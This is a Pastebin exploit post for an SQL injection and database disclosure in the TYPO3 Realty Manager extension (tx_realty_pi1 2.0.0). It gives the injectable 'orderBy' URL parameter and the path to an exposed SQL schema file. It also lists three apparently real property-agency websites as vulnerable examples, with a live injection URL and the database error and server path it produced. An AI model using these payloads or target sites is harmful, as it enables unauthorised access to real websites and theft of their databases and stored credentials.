API tools faq
paste
KingSkrupellos

Typo3 Realty Manager tx_realty_pi1 2.0.0 SQL Inj DB Disc

KingSkrupellos
Feb 18th, 2019
62
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.64 KB | None | 0 0
raw download clone embed print report
  1. ############################################################################################
  2.  
  3. # Exploit Title : Typo3 CMS Realty Manager tx_realty_pi1 2.0.0 SQL Injection / Database Disclosure
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 18/02/2019
  7. # Vendor Homepage : typo3.org ~ oliverklee.de
  8. # Software Download Link : github.com/TYPO3-svn-archive/realty/archive/master.zip
  9. extensions.typo3.org/extension/download/realty/2.0.0/zip/
  10. # Software Information Link : extensions.typo3.org/extension/realty/
  11. github.com/TYPO3-svn-archive/realty
  12. # Software Version : From 0.1.0 - 0.5.3 to 2.0.0 / All Versions
  13. # Tested On : Windows and Linux
  14. # Category : WebApps
  15. # Exploit Risk : Medium
  16. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  17. Special Elements used in an SQL Command ('SQL Injection') ]
  18. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  19. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  20. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  21.  
  22. ############################################################################################
  23.  
  24. # Description about Software :
  25. ***************************
  26. Provides a plugin that displays realty objects (properties, real estate),
  27.  
  28. including an image gallery for each object.
  29.  
  30. ############################################################################################
  31.  
  32. # Impact :
  33. ***********
  34. * Typo3 Realty Manager tx_realty_pi1 2.0.0 [ and other versions ]
  35.  
  36. extension for TYPO3 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize
  37.  
  38. user-supplied data before using it in an SQL query.
  39.  
  40. Exploiting this issue could allow an attacker to compromise the application,
  41.  
  42. access or modify data, or exploit latent vulnerabilities in the underlying database.
  43.  
  44. A remote attacker can send a specially crafted request to the vulnerable application
  45.  
  46. and execute arbitrary SQL commands in application`s database.
  47.  
  48. Further exploitation of this vulnerability may result in unauthorized data manipulation.
  49.  
  50. An attacker can exploit this issue using a browser.
  51.  
  52. * On the other hand, this Software prone to an information exposure/database disclosure vulnerability.
  53.  
  54. Successful exploits of this issue may allow an attacker to obtain sensitive
  55.  
  56. information by downloading the full contents of the application's database.
  57.  
  58. * Any remote user may download the database files and gain access
  59.  
  60. to sensitive information including unencrypted authentication credentials.
  61.  
  62. ############################################################################################
  63.  
  64. # SQL Injection Exploit :
  65. ***********************
  66.  
  67. /index.php?id=[ID-NUMBER]&tx_realty_pi1%5Bcity%5D=[ID-NUMBER]&tx_realty_pi1%5Bdistrict%5D=[ID-NUMBER]&tx_realty_pi1%5BorderBy%5D=[SQL Injection]
  68.  
  69. # Database Disclosure Exploit :
  70. ***************************
  71.  
  72. /typo3conf/ext/realty/ext_table.sql
  73.  
  74. ############################################################################################
  75.  
  76. # Example Vulnerable Sites :
  77. *************************
  78. [+] dietmar-buecher.de/index.php?id=33&tx_realty_pi1%5Bcity%5D=1&tx_realty_pi1%5Bdistrict%5D=11818&tx_realty_pi1%5BorderBy%5D=1%27
  79.  
  80. [+] fuggerstadtimmobilien.de/typo3conf/ext/realty/ext_tables.sql
  81.  
  82. [+] baden-baden-exklusiv-immobilien.de/typo3conf/ext/realty/ext_tables.sql
  83.  
  84. ############################################################################################
  85.  
  86. # Example SQL Database Error :
  87. ****************************
  88. You have an error in your SQL syntax; check the manual that corresponds to your
  89. MariaDB server version for the right syntax to use near 'LIMIT 0,1' at line 1
  90.  
  91. The last built query
  92. *****************
  93. SELECT COUNT(*) AS oelib_counter FROM tx_realty_objects
  94. INNER JOIN tx_realty_cities ON tx_realty_objects.city = tx_realty_cities.uid
  95. WHERE 1=1 AND tx_realty_objects.deleted=0 AND tx_realty_objects.t3ver_state
  96. <=0 AND tx_realty_objects.pid<>-1 AND tx_realty_objects.hidden=0 AND
  97. tx_realty_objects.starttime<=1550508420 AND (tx_realty_objects.endtime=0 OR
  98. tx_realty_objects.endtime>1550508420) AND tx_realty_cities.deleted=0 AND
  99. house_type = 2 AND tx_realty_objects.city = 1 AND tx_realty_objects.project_id = LIMIT 0,1
  100.  
  101. #0 /home/jail/home/buecher/htdocs/typo3conf/ext/oelib/class.tx_oelib_db.php(394):
  102. tx_oelib_db::select('COUNT(*) AS oel...', 'tx_realty_objec...', '1=1 AND tx_real...', '', '', '0,1')
  103.  
  104. ############################################################################################
  105.  
  106. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  107.  
  108. ############################################################################################
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!